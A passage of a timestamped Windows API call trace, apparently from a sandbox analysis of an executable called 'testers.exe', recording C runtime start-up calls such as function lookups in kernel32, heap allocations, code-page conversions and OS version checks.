hStdError=0x77cc7daf)) [0071.036] GetProcessHeap () returned 0x650000 [0071.038] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0071.038] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0071.038] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0071.038] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0071.038] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0071.039] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0071.039] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0071.039] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0071.039] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0071.039] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0071.039] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0071.039] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0071.040] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0071.040] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0071.040] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0071.040] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0071.040] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0071.040] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0071.040] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0071.040] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0071.040] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0071.041] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0071.041] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0071.041] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0071.041] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0071.041] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0071.041] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0071.041] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0071.041] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0071.042] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0071.042] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0071.042] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0071.042] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0071.042] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0071.042] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x3bc) returned 0x672080 [0071.043] GetCurrentThreadId () returned 0x318 [0071.043] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x662ac0 [0071.043] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x800) returned 0x672448 [0071.043] GetStartupInfoW (in: lpStartupInfo=0x63f870 | out: lpStartupInfo=0x63f870*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x39d0d, hStdOutput=0xb2708f91, hStdError=0x0)) [0071.043] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0071.043] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0071.043] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0071.043] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe\" " [0071.043] GetEnvironmentStringsW () returned 0x672c50* [0071.043] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xada) returned 0x673738 [0071.044] FreeEnvironmentStringsW (penv=0x672c50) returned 1 [0071.044] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xd4ba8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\testers.exe")) returned 0x31 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x6c) returned 0x672c50 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x98) returned 0x672cc8 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x3e) returned 0x6621d8 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x6c) returned 0x672d68 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x6e) returned 0x672de0 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x78) returned 0x65f918 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x62) returned 0x662ae0 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2e) returned 0x66c700 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x48) returned 0x668298 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x28) returned 0x66c128 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1a) returned 0x66fc98 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4a) returned 0x672e58 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x72) returned 0x65f998 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x30) returned 0x66c738 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2e) returned 0x66c770 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1c) returned 0x66fcc0 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xd2) returned 0x672eb0 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x7c) returned 0x672f90 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x36) returned 0x673018 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x3a) returned 0x662220 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x90) returned 0x673058 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x24) returned 0x66c158 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x30) returned 0x66c7a8 [0071.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x36) returned 0x6730f0 [0071.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x48) returned 0x6682e8 [0071.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x52) returned 0x673130 [0071.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x3c) returned 0x662268 [0071.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x82) returned 0x673190 [0071.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2e) returned 0x66c7e0 [0071.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1e) returned 0x66fce8 [0071.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2c) returned 0x66c818 [0071.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x54) returned 0x674238 [0071.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x52) returned 0x674298 [0071.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x2a) returned 0x66c850 [0071.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x3c) returned 0x6622b0 [0071.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x54) returned 0x6742f8 [0071.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x24) returned 0x66c188 [0071.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x30) returned 0x66c888 [0071.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x8c) returned 0x673220 [0071.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x673738 | out: hHeap=0x650000) returned 1 [0071.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x80) returned 0x675220 [0071.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x800) returned 0x6752a8 [0071.046] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0071.046] GetLastError () returned 0x0 [0071.046] SetLastError (dwErrCode=0x0) [0071.046] GetLastError () returned 0x0 [0071.046] SetLastError (dwErrCode=0x0) [0071.046] GetLastError () returned 0x0 [0071.046] SetLastError (dwErrCode=0x0) [0071.046] GetACP () returned 0x4e4 [0071.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x220) returned 0x675ab0 [0071.046] GetLastError () returned 0x0 [0071.047] SetLastError (dwErrCode=0x0) [0071.047] IsValidCodePage (CodePage=0x4e4) returned 1 [0071.047] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x63f864 | out: lpCPInfo=0x63f864) returned 1 [0071.047] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x63f32c | out: lpCPInfo=0x63f32c) returned 1 [0071.047] GetLastError () returned 0x0 [0071.047] SetLastError (dwErrCode=0x0) [0071.047] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x63f740, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0071.047] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x63f740, cbMultiByte=256, lpWideCharStr=0x63f0a8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0071.047] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x63f340 | out: lpCharType=0x63f340) returned 1 [0071.047] GetLastError () returned 0x0 [0071.047] SetLastError (dwErrCode=0x0) [0071.047] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x63f740, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0071.047] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x63f740, cbMultiByte=256, lpWideCharStr=0x63f078, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0071.047] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0071.047] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x63ee68, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0071.047] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x63f640, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x01\x8fp²|øc", lpUsedDefaultChar=0x0) returned 256 [0071.047] GetLastError () returned 0x0 [0071.047] SetLastError (dwErrCode=0x0) [0071.048] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x63f740, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0071.048] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x63f740, cbMultiByte=256, lpWideCharStr=0x63f098, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x03Ā") returned 256 [0071.048] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x03Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0071.048] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x03Ā", cchSrc=256, lpDestStr=0x63ee88, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0071.048] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x63f540, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x01\x8fp²|øc", lpUsedDefaultChar=0x0) returned 256 [0071.048] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0071.048] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x44d1c) returned 0x0 [0071.048] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x675220) returned 0x80 [0071.049] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x675220) returned 0x80 [0071.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x3c) returned 0x6622f8 [0071.049] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x675220) returned 0x80 [0071.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x6633b8 [0071.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x675cd8 [0071.049] GetVersionExW (in: lpVersionInformation=0x63f758*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x1f1e1d1c, dwMinorVersion=0x23222120, dwBuildNumber=0x27262524, dwPlatformId=0xb1000f, szCSDVersion="\x04") | out: lpVersionInformation=0x63f758*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0071.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6633b8 | out: hHeap=0x650000) returned 1 [0071.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x66fd38 [0071.049] GetCurrentProcess () returned 0xffffffff [0071.049] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x63f8a8 | out: Wow64Process=0x63f8a8) returned 1 [0071.049] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 